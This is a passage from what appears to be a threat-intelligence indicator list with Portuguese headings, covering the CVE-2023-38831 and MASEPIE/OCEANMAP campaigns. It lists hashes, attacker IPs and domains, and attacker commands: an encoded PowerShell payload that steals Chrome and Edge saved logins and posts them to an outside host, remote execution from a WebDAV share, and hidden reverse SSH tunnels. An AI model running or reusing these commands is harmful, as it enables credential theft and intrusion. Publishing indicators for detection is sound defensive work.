        • 147.78.46[.]40
        • 196.196.156[.]2
        • 2.59.222[.]98
      • Arquivos:
        • SFX: d21aa84542303ca70b59b53e9de9f092f9001f409158a9d46a5e8ce82ab60fb6
        • LNK: 0eec5a7373b28a991831d9be1e30976ceb057e5b701e732372524f1a50255c7
        • VBS: 8aca535047a3a38a57f80a64d9282ace7a33c54336cd08662409352c23507602
        • Decoy: 2c2fa6b9fbb6aa270ba0f49ebb361ebf7d36258e1bdfd825bc2faeb738c487ed
        • SFX: 659abb39eec218de66e2c1d917b22149ead7b743d3fe968ef840ef22318060fd
        • LNK: 0aa794e54c19dbcd5425405e3678ab9bc98fb7ea787684afb962ee22a1c0ab51
        • VBS: 4e8de351db362c519504509df309c7b58b891baf9cb99a3500b92fe0ef772924
        • Decoy: 53812d7bdaf5e8e5c1b99b4b9f3d8d3d7726d4c6c23a72fb109132d96ca725c2
        • HTA: 38b49818bb95108187fb4376e9537084062207f91310cdafcb9e4b7aa0d078f9
        • VBS: a10209c10bf373ed682a13dad4ff3aea95f0fdcd48b62168c6441a1c9f06be37
        • Decoy: 61a5b971a6b5f9c2b5e9a860c996569da30369ac67108d4b8a71f58311a6e1f1
        • SFX: 86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a
        • LNK: 762c7289fb016bbcf976bd104bd8da72e17d6d81121a846cd40480dbdd876378
        • VBS: 39d56eab8adfe9eb244914dde42ec7f12f48836d3ba56c479ab21bdbc41025fe
        • Decoy: f75f1d4c561fcb013e262b3667982759f215ba7e714c43474755b72ed7f9d01e
        • CVE-2023-38831 ZIP: 986694cad425c8f566e4e12c104811d4e8b30ce6c4c4d38f919b617b1aa66b05
        • CVE Payload: 54458ebfbe56bc932e75d6d0a5c1222286218a8ef26face40f2a0c0ec2517584
        • VBS: 96ab977f8763762af26bad2b6c501185b25916775b4ed2d18ad66b4c38bd5f0d
        • Decoy: 6a638569f831990df48669ca81fec37c6da380dbaaa6432d4407985e809810da
        • CVE-2023-38831 ZIP: 87291b918218e01cac58ea55472d809d8cdd79266c372aebe9ee593c0f4e3b77
        • CVE Payload: f5f269cf469bf9c9703fe0903cda100acbb4b3e13dbfef6b6ee87a907e5fcd1b
        • VBS: e34fc4910458e9378ea357baf045e9c0c21515a0b8818a5b36daceb2af464ea0 
        • SFX: 2a3da413f9f0554148469ea715f2776ab40e86925fb68cc6279ffc00f4f410dd
        • LNK: 0acd4a9ef18f3fd1ccf440879e768089d4dd2107e1ce19d2a17a59ebed8c7f5d
        • VBS: 6f5f265110490158df91ca8ad429a96f8af69ca30b9e3b0d9c11d4fef74091e8
        • Decoy: 736c0128402d83cd3694a5f5bb02072d77385c587311274e3229e9b2fd5c5af7
    • MASEPIE (CERT-UA)
      • Arquivos:
        • 2.txt: 9724cecaa8ca38041ee9f2a42cc5a297 4fa8caea8002cd2247c2d5fd15d4e76762a0f0cdb7a3c9de5b7f4d6b2ab34ec6
        • 2.ps1 (STEELHOOK): 5f126b2279648d849e622e4be910b96c 6bae493b244a94fd3b268ff0feb1cd1fbc7860ecf71b1053bf43eea88e578be9
        • Client.py (MASEPIE): 47f4b4d8f95a7e842691120c66309d5b 18f891a3737bb53cd1ab451e2140654a376a43b2d75f6695f3133d47a41952b6
        • VMSearch.sfx.exe: 8d1b91e8fb68e227f1933cfab99218a4 6d44532b1157ddc2e1f41df178ea9cbc896c19f79e78b3014073af2d8d9504fe
        • VMSearch.exe (OCEANMAP): 6fdd416a768d04a1af1f28ecaa29191b fb2c0355b5c3adc9636551b3fd9a861f4b253a212507df0e346287110233dc23
        • VMSearch.exe (OCEANMAP): 5db75e816b4cef5cc457f0c9e3fc4100 24fd571600dcc00bf2bb8577c7e4fd67275f7d19d852b909395bebcbb1274e04
        • KFP.311.152.2023.pdf .lnk: 6128d9bf34978d2dc7c0a2d463d1bcdd 19d0c55ac466e4188c4370e204808ca0bc02bba480ec641da8190cb8aee92bdc
        • KFP.311.152.2023.pdf.lnk: 825a12e2377dd694bbb667f862d60c43 593583b312bf48b7748f4372e6f4a560fd38e969399cf2a96798e2594a517bf4 
        • Стратегії України.pdf .lnk: acd9fc44001da67f1a3592850ec09cb7 c22868930c02f2d6962167198fde0d3cda78ac18af506b57f1ca25ca5c39c50d
      • Redes:
        • \\194[.]126.178.8@80\webdav\Docs\231130 № 581.pdf .lnk 
        • \\194[.]126.178.8@80\webdav\Docs\231130 № 581.pdf 
        • \\194[.]126.178.8@80\webdav\Python39\Client[.]py 
        • \\\194[.]126.178.8@80\webdav\Python39\python[.]exe
        • 173[.]239.196.66 (X-Originating-IP)
        • (tcp)://88[.]209.251.6:80
        • 194[.]126.178.8
        • 88[.]209.251.6
        • 74[.]124.219.71 (OCEANMAP C2) 
        • czyrqdnvpujmmjkfhhvs4knf1av02demj.oast[.]fun 
        • czyrqdnvpujmmjkfhhvsclx05sfi23bfr.oast[.]fun 
        • czyrqdnvpujmmjkfhhvsgapqr3hclnhhj.oast[.]fun 
        • czyrqdnvpujmmjkfhhvsvlaax17vd5r6v.oast[.]fun 
        • hXXp://194[.]126.178.8/webdav/wody[.]pdf 
        • hXXp://194[.]126.178.8/webdav/wody[.]zip 
        • hXXp://194.126.178.8/webdav/StrategyUa.pdf 
        • hXXp://194[.]126.178.8/webdav/231130N581[.]pdf 
        • hXXp://czyrqdnvpujmmjkfhhvsclx05sfi23bfr.oast[.]fun 
        • hXXp://czyrqdnvpujmmjkfhhvsgapqr3hclnhhj.oast[.]fun 
        • hXXp://czyrqdnvpujmmjkfhhvsvlaax17vd5r6v.oast[.]fun 
        • hXXp://czyrqdnvpujmmjkfhhvs4knf1av02demj.oast[.]fun
        • hXXps://nas-files.firstcloudit[.]com/
        • hXXps://ua-calendar.firstcloudit[.]com/
        • hXXps://e-nas.firstcloudit[.]com/
        • jrb@bahouholdings.com (OCEANMAP C2)
        • nas-files.firstcloudit[.]com
        • e-nas.firstcloudit[.]com
        • ua-calendar.firstcloudit[.]com 
        • qasim.m@facadesolutionsuae.com (OCEANMAP C2) 
        • webmail.facadesolutionsuae[.]com (OCEANMAP C2)
      • Comandos e arquivos locais:
        • %PROGRAMDATA%\2.txt
        • %PROGRAMDATA%\python.zip
        • %PROGRAMDATA%\python\python-3.10.0-embed-amd64\Client.py 
        • %USERPROFILE%\.ssh\known_hosts %LOCALAPPDATA%\11.zip 
        • %LOCALAPPDATA%\Temp\RarSFX0\VMSearch.exe 
        • %LOCALAPPDATA%\Temp\RarSFX1\VMSearch.exe 
        • %LOCALAPPDATA%\Temp\VMSearch.sfx.exe
        • %LOCALAPPDATA%\i.lnk 
        • %LOCALAPPDATA%\key
        • %LOCALAPPDATA%\python.zip 
        • %LOCALAPPDATA%\python\python-3.10.0-embed-amd64\Client.py 
        • %LOCALAPPDATA%\python\python-3.10.0-embed-amd64\python.exe 
        • %LOCALAPPDATA%\qz.zip
        • %LOCALAPPDATA%\s.lnk 
        • %LOCALAPPDATA%\s.zip
        • %LOCALAPPDATA%\s2.zip 
        • %LOCALAPPDATA%\s3.zip
        • %LOCALAPPDATA%\sys.zip 
        • %LOCALAPPDATA%\t.lnk
        • %LOCALAPPDATA%\temp1.txt
        • %LOCALAPPDATA%\temp2.txt
        • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\SystemUpdate.lnk 
        • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\VMSearch.url 
        • C:\WINDOWS\system32\cmd.exe /c "powershell.exe -c "$a=Get-Content "%LOCALAPPDATA%\2.txt";powershell.exe -windowstyle hidden -encodedCommand $a""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hid -nop -c "%PROGRAMDATA%\python\python-3.10.0-embed-amd64\python.exe %PROGRAMDATA%\python\python-3.10.0-embed-amd64\Client.py" 
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hid -nop -c "[system.Diagnostics.Process]::Start('msedge','http://194.126.178.8/webdav/231130N581.pdf'); \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py" 
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hid -nop -c "[system.Diagnostics.Process]::Start('msedge','http://194.126.178.8/webdav/wody.pdf'); \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py" 
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hid -nop -c "[system.Diagnostics.Process]::Start('msedge','http://194.126.178.8/webdav/StrategyUa.pdf'); \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py" 
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hid -nop -c %LOCALAPPDATA%\python\python-3.10.0-embed-amd64\python.exe %LOCALAPPDATA%\python\python-3.10.0-embed-amd64\Client.py 
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hid -nop -c \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py 
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -encodedCommand "QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwA7ACAAQQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5ADsAIAAkAGgAbwBvAGsAPQAiAGgAdAB0AHAAOgAvAC8AYwB6AHkAcgBxAGQAbgB2AHAAdQBqAG0AbQBqAGsAZgBoAGgAdgBzAGMAbAB4ADAANQBzAGYAaQAyADMAYgBmAHIALgBvAGEAcwB0AC4AZgB1AG4AIgA7ACAAJABkAGEAdABhAFAAYQB0AGgAPQAiACQAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAKQBcAFwARwBvAG8AZwBsAGUAXABcAEMAaAByAG8AbQBlAFwAXABVAHMAZQByACAARABhAHQAYQBcAFwARABlAGYAYQB1AGwAdABcAFwATABvAGcAaQBuACAARABhAHQAYQAiADsAIAAkAGwAbwBjAGEAbABTAHQAYQB0AGUAUABhAHQAaAAgAD0AIAAiACQAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAKQBcAFwARwBvAG8AZwBsAGUAXABcAEMAaAByAG8AbQBlAFwAXABVAHMAZQByACAARABhAHQAYQBcAFwATABvAGMAYQBsACAAUwB0AGEAdABlACIAOwAgACQAbABvAGMAYQBsAFMAdABhAHQAZQBKAHMAbwBuAD0AIABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGwAbwBjAGEAbABTAHQAYQB0AGUAUABhAHQAaAAgAC0AUgBhAHcAIAB8ACAAQwBvAG4AdgBlAHIAdABGAHIAbwBtAC0ASgBzAG8AbgA7ACQAZQBuAGMAXwBrAGUAeQAgAD0AIAAkAGwAbwBjAGEAbABTAHQAYQB0AGUASgBzAG8AbgAuAG8AcwBfAGMAcgB5AHAAdAAuAGUAbgBjAHIAeQBwAHQAZQBkAF8AawBlAHkAOwAgACQAbQBhAHMAdABlAHIAXwBrAGUAeQBfAGUAbgBjAG8AZABlAGQAIAA9ACAAWwBiAHkAdABlAFsAXQBdAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBfAGsAZQB5ACkAOwAgACQAawBlAHkAIAA9ACAAWwBzAHkAcwB0AGUAbQAuAHMAZQBjAHUAcgBpAHQAeQAuAGMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AcAByAG8AdABlAGMAdABlAGQAZABhAHQAYQBdADoAOgBVAG4AcAByAG8AdABlAGMAdAAoACQAbQBhAHMAdABlAHIAXwBrAGUAeQBfAGUAbgBjAG8AZABlAGQAWwA1AC4ALgAkAG0AYQBzAHQAZQByAF8AawBlAHkAXwBlAG4AYwBvAGQAZQBkAC4AbABlAG4AZwB0AGgAXQAsACAAJABuAHUAbABsACwAIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBEAGEAdABhAFAAcgBvAHQAZQBjAHQAaQBvAG4AUwBjAG8AcABlAF0AOgA6AEMAdQByAHIAZQBuAHQAVQBzAGUAcgApADsAIAAkAGwAbwBnAGkAbgBEAGEAdABhAEMAbwBuAHQAZQBuAHQAIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBwAGEAdABoACAAJABkAGEAdABhAFAAYQB0AGgAIAAtAEUAbgBjAG8AZABpAG4AZwAgAGIAeQB0AGUAKQApADsAIAAkAHAAbwBzAHQAUABhAHIAYQBtAHMAIAA9ACAAQAB7AGsAZQB5AD0AKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGsAZQB5ACkAKQA7AGQAYQB0AGEAPQAkAGwAbwBnAGkAbgBEAGEAdABhAEMAbwBuAHQAZQBuAHQAIAB9ADsAIABJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcgBpACAAJABoAG8AbwBrACAALQBNAGUAdABoAG8AZAAgAFAATwBTAFQAIAAtAEIAbwBkAHkAIAAkAHAAbwBzAHQAUABhAHIAYQBtAHMAIAAtAHUAcwBlAGIAOwAgACQAZABhAHQAYQBQAGEAdABoAD0AIgAkACgAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBACkAXABcAE0AaQBjAHIAbwBzAG8AZgB0AFwAXABFAGQAZwBlAFwAXABVAHMAZQByACAARABhAHQAYQBcAFwARABlAGYAYQB1AGwAdABcAFwATABvAGcAaQBuACAARABhAHQAYQAiADsAIAAkAGwAbwBjAGEAbABTAHQAYQB0AGUAUABhAHQAaAAgAD0AIAAiACQAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAKQBcAFwATQBpAGMAcgBvAHMAbwBmAHQAXABcAEUAZABnAGUAXABcAFUAcwBlAHIAIABEAGEAdABhAFwAXABMAG8AYwBhAGwAIABTAHQAYQB0AGUAIgA7ACAAJABsAG8AYwBhAGwAUwB0AGEAdABlAEoAcwBvAG4APQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAbABvAGMAYQBsAFMAdABhAHQAZQBQAGEAdABoACAALQBSAGEAdwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJABlAG4AYwBfAGsAZQB5ACAAPQAgACQAbABvAGMAYQBsAFMAdABhAHQAZQBKAHMAbwBuAC4AbwBzAF8AYwByAHkAcAB0AC4AZQBuAGMAcgB5AHAAdABlAGQAXwBrAGUAeQA7ACAAJABtAGEAcwB0AGUAcgBfAGsAZQB5AF8AZQBuAGMAbwBkAGUAZAAgAD0AIABbAGIAeQB0AGUAWwBdAF0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGUAbgBjAF8AawBlAHkAKQA7ACAAJABrAGUAeQAgAD0AIABbAHMAeQBzAHQAZQBtAC4AcwBlAGMAdQByAGkAdAB5AC4AYwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBwAHIAbwB0AGUAYwB0AGUAZABkAGEAdABhAF0AOgA6AFUAbgBwAHIAbwB0AGUAYwB0ACgAJABtAGEAcwB0AGUAcgBfAGsAZQB5AF8AZQBuAGMAbwBkAGUAZABbADUALgAuACQAbQBhAHMAdABlAHIAXwBrAGUAeQBfAGUAbgBjAG8AZABlAGQALgBsAGUAbgBnAHQAaABdACwAIAAkAG4AdQBsAGwALAAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEQAYQB0AGEAUAByAG8AdABlAGMAdABpAG8AbgBTAGMAbwBwAGUAXQA6ADoAQwB1AHIAcgBlAG4AdABVAHMAZQByACkAOwAgACQAbABvAGcAaQBuAEQAYQB0AGEAQwBvAG4AdABlAG4AdAAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAHAAYQB0AGgAIAAkAGQAYQB0AGEAUABhAHQAaAAgAC0ARQBuAGMAbwBkAGkAbgBnACAAYgB5AHQAZQApACkAOwAgACQAcABvAHMAdABQAGEAcgBhAG0AcwAgAD0AIABAAHsAawBlAHkAPQAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAawBlAHkAKQApADsAZABhAHQAYQA9ACQAbABvAGcAaQBuAEQAYQB0AGEAQwBvAG4AdABlAG4AdAAgAH0AOwAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgAC0AVQByAGkAIAAkAGgAbwBvAGsAIAAtAE0AZQB0AGgAbwBkACAAUABPAFMAVAAgAC0AQgBvAGQAeQAgACQAcABvAHMAdABQAGEAcgBhAG0AcwAgAC0AdQBzAGUAYgA7AA==" 
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -encodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwA7ACAAQQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5ADsAIAAkAGgAbwBvAGsAPQAiAGgAdAB0AHAAOgAvAC8AYwB6AHkAcgBxAGQAbgB2AHAAdQBqAG0AbQBqAGsAZgBoAGgAdgBzAGMAbAB4ADAANQBzAGYAaQAyADMAYgBmAHIALgBvAGEAcwB0AC4AZgB1AG4AIgA7ACAAJABkAGEAdABhAFAAYQB0AGgAPQAiACQAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAKQBcAFwARwBvAG8AZwBsAGUAXABcAEMAaAByAG8AbQBlAFwAXABVAHMAZQByACAARABhAHQAYQBcAFwARABlAGYAYQB1AGwAdABcAFwATABvAGcAaQBuACAARABhAHQAYQAiADsAIAAkAGwAbwBjAGEAbABTAHQAYQB0AGUAUABhAHQAaAAgAD0AIAAiACQAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAKQBcAFwARwBvAG8AZwBsAGUAXABcAEMAaAByAG8AbQBlAFwAXABVAHMAZQByACAARABhAHQAYQBcAFwATABvAGMAYQBsACAAUwB0AGEAdABlACIAOwAgACQAbABvAGMAYQBsAFMAdABhAHQAZQBKAHMAbwBuAD0AIABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGwAbwBjAGEAbABTAHQAYQB0AGUAUABhAHQAaAAgAC0AUgBhAHcAIAB8ACAAQwBvAG4AdgBlAHIAdABGAHIAbwBtAC0ASgBzAG8AbgA7ACQAZQBuAGMAXwBrAGUAeQAgAD0AIAAkAGwAbwBjAGEAbABTAHQAYQB0AGUASgBzAG8AbgAuAG8AcwBfAGMAcgB5AHAAdAAuAGUAbgBjAHIAeQBwAHQAZQBkAF8AawBlAHkAOwAgACQAbQBhAHMAdABlAHIAXwBrAGUAeQBfAGUAbgBjAG8AZABlAGQAIAA9ACAAWwBiAHkAdABlAFsAXQBdAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBfAGsAZQB5ACkAOwAgACQAawBlAHkAIAA9ACAAWwBzAHkAcwB0AGUAbQAuAHMAZQBjAHUAcgBpAHQAeQAuAGMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AcAByAG8AdABlAGMAdABlAGQAZABhAHQAYQBdADoAOgBVAG4AcAByAG8AdABlAGMAdAAoACQAbQBhAHMAdABlAHIAXwBrAGUAeQBfAGUAbgBjAG8AZABlAGQAWwA1AC4ALgAkAG0AYQBzAHQAZQByAF8AawBlAHkAXwBlAG4AYwBvAGQAZQBkAC4AbABlAG4AZwB0AGgAXQAsACAAJABuAHUAbABsACwAIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBEAGEAdABhAFAAcgBvAHQAZQBjAHQAaQBvAG4AUwBjAG8AcABlAF0AOgA6AEMAdQByAHIAZQBuAHQAVQBzAGUAcgApADsAIAAkAGwAbwBnAGkAbgBEAGEAdABhAEMAbwBuAHQAZQBuAHQAIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBwAGEAdABoACAAJABkAGEAdABhAFAAYQB0AGgAIAAtAEUAbgBjAG8AZABpAG4AZwAgAGIAeQB0AGUAKQApADsAIAAkAHAAbwBzAHQAUABhAHIAYQBtAHMAIAA9ACAAQAB7AGsAZQB5AD0AKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGsAZQB5ACkAKQA7AGQAYQB0AGEAPQAkAGwAbwBnAGkAbgBEAGEAdABhAEMAbwBuAHQAZQBuAHQAIAB9ADsAIABJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcgBpACAAJABoAG8AbwBrACAALQBNAGUAdABoAG8AZAAgAFAATwBTAFQAIAAtAEIAbwBkAHkAIAAkAHAAbwBzAHQAUABhAHIAYQBtAHMAIAAtAHUAcwBlAGIAOwAgACQAZABhAHQAYQBQAGEAdABoAD0AIgAkACgAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBACkAXABcAE0AaQBjAHIAbwBzAG8AZgB0AFwAXABFAGQAZwBlAFwAXABVAHMAZQByACAARABhAHQAYQBcAFwARABlAGYAYQB1AGwAdABcAFwATABvAGcAaQBuACAARABhAHQAYQAiADsAIAAkAGwAbwBjAGEAbABTAHQAYQB0AGUAUABhAHQAaAAgAD0AIAAiACQAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAKQBcAFwATQBpAGMAcgBvAHMAbwBmAHQAXABcAEUAZABnAGUAXABcAFUAcwBlAHIAIABEAGEAdABhAFwAXABMAG8AYwBhAGwAIABTAHQAYQB0AGUAIgA7ACAAJABsAG8AYwBhAGwAUwB0AGEAdABlAEoAcwBvAG4APQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAbABvAGMAYQBsAFMAdABhAHQAZQBQAGEAdABoACAALQBSAGEAdwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJABlAG4AYwBfAGsAZQB5ACAAPQAgACQAbABvAGMAYQBsAFMAdABhAHQAZQBKAHMAbwBuAC4AbwBzAF8AYwByAHkAcAB0AC4AZQBuAGMAcgB5AHAAdABlAGQAXwBrAGUAeQA7ACAAJABtAGEAcwB0AGUAcgBfAGsAZQB5AF8AZQBuAGMAbwBkAGUAZAAgAD0AIABbAGIAeQB0AGUAWwBdAF0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGUAbgBjAF8AawBlAHkAKQA7ACAAJABrAGUAeQAgAD0AIABbAHMAeQBzAHQAZQBtAC4AcwBlAGMAdQByAGkAdAB5AC4AYwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBwAHIAbwB0AGUAYwB0AGUAZABkAGEAdABhAF0AOgA6AFUAbgBwAHIAbwB0AGUAYwB0ACgAJABtAGEAcwB0AGUAcgBfAGsAZQB5AF8AZQBuAGMAbwBkAGUAZABbADUALgAuACQAbQBhAHMAdABlAHIAXwBrAGUAeQBfAGUAbgBjAG8AZABlAGQALgBsAGUAbgBnAHQAaABdACwAIAAkAG4AdQBsAGwALAAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEQAYQB0AGEAUAByAG8AdABlAGMAdABpAG8AbgBTAGMAbwBwAGUAXQA6ADoAQwB1AHIAcgBlAG4AdABVAHMAZQByACkAOwAgACQAbABvAGcAaQBuAEQAYQB0AGEAQwBvAG4AdABlAG4AdAAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAHAAYQB0AGgAIAAkAGQAYQB0AGEAUABhAHQAaAAgAC0ARQBuAGMAbwBkAGkAbgBnACAAYgB5AHQAZQApACkAOwAgACQAcABvAHMAdABQAGEAcgBhAG0AcwAgAD0AIABAAHsAawBlAHkAPQAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAawBlAHkAKQApADsAZABhAHQAYQA9ACQAbABvAGcAaQBuAEQAYQB0AGEAQwBvAG4AdABlAG4AdAAgAH0AOwAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgAC0AVQByAGkAIAAkAGgAbwBvAGsAIAAtAE0AZQB0AGgAbwBkACAAUABPAFMAVAAgAC0AQgBvAGQAeQAgACQAcABvAHMAdABQAGEAcgBhAG0AcwAgAC0AdQBzAGUAYgA7AA== 
        • \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py
        • cmd /C start powershell.exe -w hid -nop -c "%LOCALAPPDATA%\python\python-3.10.0-embed-amd64\python.exe %LOCALAPPDATA%\python\python-3.10.0-embed-amd64\Client.py"
        • powershell -c start-process ssh.exe -windowstyle Hidden -ArgumentList "-N -o ServerAliveInterval=30 -p80 root@88.209.251.6 -R 88.209.251.6:10858 -i %LOCALAPPDATA%\key -oPubkeyAcceptedKeyTypes=ssh-rsa -oStrictHostKeyChecking=no" -PassThru
        • powershell -c start-process ssh.exe -windowstyle Hidden -ArgumentList "-N -o ServerAliveInterval=30 -p80 root@88.209.251.6 -R 88.209.251.6:10859 -i %LOCALAPPDATA%\key -oPubkeyAcceptedKeyTypes=ssh-rsa -oStrictHostKeyChecking=no" -PassThru
        • powershell.exe -c "$a=Get-Content "%PROGRAMDATA%\2.txt";powershell.exe -windowstyle hidden -encodedCommand $a"powershell.exe -c $a=Get-Content "%PROGRAMDATA%\2.txt";powershell.exe -windowstyle hidden -encodedCommand $a
        • powershell.exe -c $a=Get-Content -Encoding 'Default' -Path "%LOCALAPPDATA%\temp.txt";"$a"
        • powershell.exe -c $a=Get-Content -Encoding 'String' -Path "%LOCALAPPDATA%\temp.txt";"$a"
        • powershell.exe -c $a=Get-Content -Encoding 'ascii' -Path "%LOCALAPPDATA%\temp.txt";"$a"
        • powershell.exe -c $a=Get-Content -Encoding 'oem' -Path "%LOCALAPPDATA%\temp.txt";"$a" 
        • powershell.exe -c $a=Get-Content -Encoding 'oem' -Path "%LOCALAPPDATA%\temp.txt";Compress-Archive -Force "$a" %LOCALAPPDATA%\s.zip
        • powershell.exe -c $a=Get-Content -Encoding 'oem' -Path "%LOCALAPPDATA%\temp.txt";dir "$a"
        • powershell.exe -c $a=Get-Content -Encoding 'oem' -Path "%LOCALAPPDATA%\temp1.txt";Compress-Archive -Force "$a" %LOCALAPPDATA%\s2.zip
        • powershell.exe -c $a=Get-Content -Encoding 'oem' -Path "%LOCALAPPDATA%\temp2.txt";Compress-Archive -Force "$a" %LOCALAPPDATA%\s3.zip
        • powershell.exe -c $a=Get-Content -Encoding 'oem' -Path "%LOCALAPPDATA%\temp2.txt";dir "$a"
        • powershell.exe -c $a=Get-Content -Encoding 'unicode' -Path "%LOCALAPPDATA%\temp.txt";"$a"
        • powershell.exe -c $a=Get-Content -Encoding 'utf32' -Path "%LOCALAPPDATA%\temp.txt";"$a" 
        • powershell.exe -c $a=Get-Content -Encoding 'utf8' -Path "%LOCALAPPDATA%\temp.txt";"$a"
        • powershell.exe -c $a=Get-Content -Path "%LOCALAPPDATA%\temp.txt";"$a"
        • powershell.exe -c $a=Get-Content -Path "%LOCALAPPDATA%\temp.txt";Compress-Archive -Force "$a" %LOCALAPPDATA%\s.zip
        • powershell.exe -c Compress-Archive -Force %USERPROFILE%\Desktop\ %LOCALAPPDATA%\qz.zip
        • powershell.exe -c Get-WinEvent -FilterHashtable @{logname="system"; id=1129}
        • powershell.exe -c Get-WinEvent -FilterHashtable @{logname="system"; id=1501}
        • powershell.exe -c dir /S %USERPROFILE% *.dat
        • powershell.exe -c import-module ActiveDirectory;Get-AdDomainController
        • powershell.exe -c net time /domain
        • powershell.exe -c net time /domain:%DOMAIN%.local
